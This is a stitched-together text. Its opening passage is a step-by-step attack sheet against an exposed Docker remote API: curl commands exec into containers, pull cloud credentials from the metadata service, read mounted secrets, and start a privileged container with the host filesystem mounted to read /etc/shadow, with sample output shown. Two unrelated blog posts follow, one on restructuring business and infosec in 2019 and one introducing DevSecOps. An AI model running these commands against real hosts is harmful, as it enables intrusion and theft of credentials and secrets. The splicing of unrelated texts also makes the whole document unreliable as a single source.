        "IP": "",
        "PrivatePort": 443,
        "PublicPort": 50278,

List processes in a container:

curl --insecure https://tls-opendocker.socker:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq

  "Processes": [

Set up and exec job to hit the metadata URL:

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO-"]}'


Get the output:

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'


  "Code" : "Success",
  "LastUpdated" : "2019-01-29T20:12:58Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIATRSNIP",
  "SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP",
  "Expiration" : "2019-01-30T02:43:34Z"

 Docker secrets
 relevant reading

 list secrets (no secrets/swarm not set up)

 curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq

 { "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."}

 list secrets (they exist)

 $ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq
    "ID": "9h3useaicj3tr465ejg2koud5",
    "Version": {
      "Index": 21

    "CreatedAt": "2018-07-06T10:19:50.677702428Z",

    "UpdatedAt": "2018-07-06T10:19:50.677702428Z",
    "Spec": {
      "Name": "registry-key.key",
      "Labels": {} }},

Check what is mounted

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'


Get the output by starting the exec

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'

overlay on / type overlay 

proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)
tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime)
tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)
tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)

Cat the mounted secret

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'


 curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d '{}'



If you have secrets, it's also worth checking out services in case they are adding secrets via environment variables

 curl -s --insecure https://tls-opendocker.socket:2376/services | jq


    "ID": "amxjs243dzmlc8vgukxdsx57y",
    "Version": {
      "Index": 6417
    "CreatedAt": "2018-04-16T19:51:20.489851317Z",
    "UpdatedAt": "2018-12-07T13:44:36.6869673Z",
    "Spec": {
      "Name": "app_REMOVED",
      "Labels": {},
      "TaskTemplate": {
        "ContainerSpec": {
          "Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739",
          "Env": [
          "Isolation": "default"

 Creating a container that has mounted the host file system

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'


curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test

Read something from the host

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'


curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'




Stop the container

curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop

delete stopped containers

curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune

Business Must Change: InfoSec in 2019

I don't know about you, but I am happy to see 2018 ended. Personally, it was a very difficult year, capping a very difficult decade. Now, as we embark into 2019, it's time to sit up and realize that we've now been in this world of e-commerce for more than 20 years (yes, really!). Many, many, many things have changed dramatically over that time, whether it be electronics (smartphones!) or communication (social media!) or transportation (electric vehicles!). However, one thing that really has not changed much is how businesses function, which is really quite sad if you think about it.

There is tons of research and evidence that shows we're now clearly within the 4th industrial age. We all know about the 1st and 2nd industrial revolutions, with the first lasting about 100 years and ending around WWI, and the second being slightly shorter and ending around the end of WWII, but many people don't realize that the 3rd age - of analog-digital transformation, mechanical automation, and industrial transformation - occurred up until sometime in the 1980s or 1990s (dividing lines are always fuzzy with such things). That said, there was definitely a watershed moment in the mid-1990s marking a clear transition from the old Deming-era industrial ways to this modern digital era.

That brings us to 2019... and the imperative for drastic changes across the board, and in particular with how businesses are structured and function (vs. the current dysfunction). More importantly, these changes are also necessary if we have any hope of fixing our organizations to be more secure and to quit hemorrhaging cash at alarming rates, whether it be from massive breaches or insane spending on pointless tools or simply just being wasteful. Here's what I believe needs to happen ASAP, and is especially important in this fragile and declining (American) economy:

1) Flat, Agile, Lean, Empowered, Generative

First and foremost, organizations need to reinvent themselves. I'm a huge proponent of Frédéric Laloux's Reinventing Organizations ( in which he talks about a better way to structure and manage. Specifically, he advocates for a flatter structure in which people are empowered to make decisions and take actions in the best interests of the whole. No, this does not mean outright anarchy and chaos, but instead advocates for nurturing a caretaker attitude within all employees such that they truly care. This is a very difficult thing to do! Especially for large enterprises, can you imagine a culture-shift that makes people care about the org and the missions and the products/services being created/provided? Daunting, to say the least.

One of the ways to get there, however, is to start adopting practices from Agile and Lean and start applying them to business management. Small teams should operate in a manner that is reasonably autonomous and empowered. You're asking people to do a task, so let them do it! However, what they do should be within a framework that emphasizes the greater good, lean principles (like eliminating waste), and - most importantly - thinking about generativity (that is, the lasting impact and sustainability of the work for and on future generations). I would submit that this seemingly small (but not trivial) change in management can have HUGE impact overall, including on the security of the organization.

Consider, if you will, that fundamentally we in infosec want people to make better decisions. Truly, that's at the core of much that we do. Those "better decisions" might equate to not falling for (spear)phishing attacks, choosing hardened environments over default installs, or following reasonable secure coding practices in the development process (to name a few). However, when people are empowered to make their own decisions and are held accountable for the lasting impacting, then and only then will they start adopting more of a caretaker mentality and start considering long-term impacts. BUT!!! - and this is very important - it also means breaking from the micromanagement techniques that have become so prevalent in business over the past 20 years. Because so much work is intangible (not physical products being produced), it is vastly more difficult to monitor and manage for quality. As such, part of this reinvention of business operations is to completely throw away factory-style TQM practices (including those created by Deming) in favor of digital-style TQM practices that better measure modern-day business functions and outputs. Ergo, what seems so small is in no way trivial or easy.

2) DevOps, Automation, and Outsourcing

This conversation naturally brings is to the DevOps movement, which is singularly the most important "invention" of the past decade. It provides a roadmap for how organizations should function overall. Key within DevOps is the notion of automation, but also equally important is the notion of outsourcing, whether that be to cloud providers or consultants/specialists or other "*-as-a-Service" providers (e.g., mainframes-as-a-service). No matter how you look at it, DevOps is the way that business should operate, and that is - interestingly enough - exactly matched to the org management model that Laloux describes (without ever getting into technology or DevOps!).

First and foremost, let's talking about what DevOps is: it's a cultural movement designed to fundamentally alter how business functions. It is not just about agile or automation or tools/toolchains or anything so simple or crass. It is a broad-scale change in business model and operation; and, it applies to everyone! Know what else parallels this target audience of *everyone*? That's right, it's infosec. Further, just as DevOps advocates applying agile and lean principles (among other things) to business operations, so does infosec advocate applying better security and risk mgmt principles to everything in the organization, too. How do you get people to make better decisions? You educate them, you help them optimize their flow, you provide timely and relevant feedback (preferably as quickly as possible), and you structure in resilience such that when failures happen (they will), they don't bring down the entire organization. Those are the Three Ways of DevOps as introduced within The Phoenix Project way back in 2013.

From a functional perspective, this means a few very specific things for infosec: 1) We must continue to work in a collaborative and consultative manner with everyone else in the organization. 2) We must heavily emphasize ways to automate much of what we're doing to minimize the overhead and functional impact on business operations while trying to achieve our desired goals (e.g., through federated identity with MFA, through deployment of SOAR tools to automate much of otherwise-wasteful SOC practices, through extensive process automation around all forms of access control/mgmt). 3) Similarly, we should continually push decision-makers within projects to ask, first and foremost, the "build or buy?" question, with an emphasis on outsourcing where possible. Our architectures should be built around APIs, integrations, and interoperability such that we avoid vendor lock-in as much as possible, have data portability (or, perhaps more accurately, application portability while we retain control to our own data), and find ways to optimize security and business by leveraging and integrating specialized resources.

3) InfoSec Bifurcation: Functional vs. Strategic

All of this discussion then brings us to a core challenge: we must change how infosec is structured, operates, and performs. Going forward, it's essential to bifurcate infosec between functional and strategic roles. Most functional roles should be directly embedded within technical teams, and should emphasize use of specialized resources. For example, we should not see large infosec/CISO organizations any more, but instead should see functional technical security resources, such as firewall engineers and appsec engineers, directly embedded into their closest related teams (e.g., network teams, dev/DevOps teams, etc.). Functional roles are specialists who are expert at particular operations.

To this end, we need to get away from these "everything but the kitchen sink" roles, whether they be called "security managers" or "security architects" or "DevSecOps engineers." These titles have become so buzzword-overloaded as to be completely meaningless! I have interviewed extensively over the past year+, and the one universal principle is that organizations are trying to find one magical, perfect hire with expert-level experience in anything and everything, which is just patently wrong and stupid and mythological. If you think you need someone who is expert in infosec AND development AND systems AND automation AND incident response AND AND AND... just stop. Please. You're seeking the impossible, setting yourself up for failure and disappointment, and - more importantly - you're causing pain (for yourself and others). Focus on the true functional requirements needed and go hire for that. Nobody can do it all (certainly not well), and there is incredible value in hiring a diverse set of personnel, whether they be FTEs or - far more likely these days - contractors. In fact, I would even go so far as to challenge people to stop thinking about full-time resources for all these functional roles, and instead think about DevOps and the gig culture and how to grab specialist contract resources as needed to perform project work and then move on. Truly, change your thinking and divert from the old, broken models.

Lastly, do invest in strategic resources. For example, a true security architect will have a broad background within strength of vision, the ability to run an entire project from start to finish (including: problem definition, solution identification and evaluation, solution testing/POC, and solution deployment). Managers and executives should also be strategic overall, focusing on ways to ensure that everything is agile, everything is lean (waste-reducing), and not micromanaging anything. For example, instead of riding a project hard to drive to completion, instead ask "Why is this project spec'd to take so long?" or "What are the obstacles to progress, completion, and success?" When looking at projects strategically, you will then find that you are instead looking at ways of working, how to be more agile, how to be more efficient and effective, and overall how to help empower people to work smarter. It's amazing the difference when you let people do their jobs and focus instead on helping them achieve their goals. Also, in doing this, it allows management ranks to thin and flatten, fewer managers can manage more projects and personnel, and so on. For infosec, this means finding and developing leaders and - of equal importance - not forcing people to leave their specialty behind simply to "move up the ranks." There shouldn't be ranks so much as effective leadership and the division between strategic and functional actors. Making this change will further the first two points above in reforming how the organization operates, while also allowing infosec progress to truly be made in a reformational matter.

I hope to write in more depth about all of these points in the coming weeks and months. First thing's first, though: I need a steady source of income! Yes, 2018 was rough, and it ended just as it had been going all along; on a major note of disappointment. But... a new year means the opportunity to turn the page, find something better. In the meantime, please take this message out to everyone and let's see if we can finally hit a tipping point in how businesses function and finally instigate meaningful change.

Cheers & Happy New Year!

DevSecOps is coming! Don’t be afraid of change.

DevSecOps is coming! Don't be afraid of change.

There has been a lot of buzz about the relationship between Security and DevOps as if we are debating their happy companionship. To me they are soulmates, and DevSecOps is a workable, scalable, and quantifiable fact unlike the big button if applied wisely.

What is DevOps?

The development cycle has undergone considerable changes in last few years. Customers and clients have evolving requirements and the market demands speed, and quality. The relationship between developers and operations have grown much closer to address this change. IT infrastructure has evolved in parallel to cater to quick timelines, and release cycles. The old legacy infrastructure with multiple toll gates if drifting away, and fast, responsive API(s) are taking place to spawn and scale vast instances of software and hardware.

Developers who were slowly getting closer to the operations team have now decided to wear both the hats and skip a 'redundant' hop. This integration has helped organisations achieve quick releases with better application stability and response times. Now, the demands of the customer or end-user can be addressed & delivered directly by the DevOps team. Sometimes people confuse agile and DevOps and its natural with the everchanging landscape.

Simply put, Agile is a methodology and is about processes (scrums, sprints etc.) while DevOps is about technical integration (CI/CD, tool and IT automation)

While Agile talks about SDLC, DevOps also integrate Operations and fluidity in Agile. It focuses on being closer to the customer and not just committing working software. DevOps in its arsenal has many tools that support - release, monitoring, management, virtualisation, automation, and orchestration of different parts of delivery fast and efficient. Its the need of the hour with the constant changes in requirements, and ecosystem. It has to evolve & release ongoing updates to keep up with the pace of the customer, and market demands. It's not mono-directional water flow; Instead, it's like an omnidirectional tube of water flowing in a gravity-free ecosystem.

What is DevSecOps?

The primary objective of DevSecOps is to integrate security at early stages of development on the process side and to make sure everyone in the team is responsible for security. It evangelises security as a strong glue to hold the bond between development and operations, by the single task force. In DecSecOps, security ought to be a part of automation via tools, controls and processes.

Traditional SDLC (software development life cycle) often perceives security as a toll gate at the end, to validate the efforts on the scale of visible threats. In DevSecOps, security is everywhere, at all stages/ phases of development and operations. It is embedded right into the life cycle that has a continuous integration between the drawing pad, security tools, and release cycle.

As Gartner documents, DevSecOps can be depicted graphically as the rapid and agile iteration from development into operations, with continuous monitoring and analytics at the core.

DevSecOps is coming! Don't be afraid of change.
Photo by Redmine

Another key driving factor for DevSecOps is the fact that perimeter security is failing to adjust with increasing integration points and the blurring of the trust boundaries. It's getting less opaque and fuzzier where the perimeter is in this cyber ecosystem. It is eminent that software has to be inherently secure itself without relying on the border security controls. Rapid development and releases lead to shortening the supply chain timeline to implement custom controls like filters, policies and firewalls.

I have tried to make the terms well understandable in this series; there are many challenges faced by organizations, and their possible solutions which I shall cover in next article.
Stay tuned.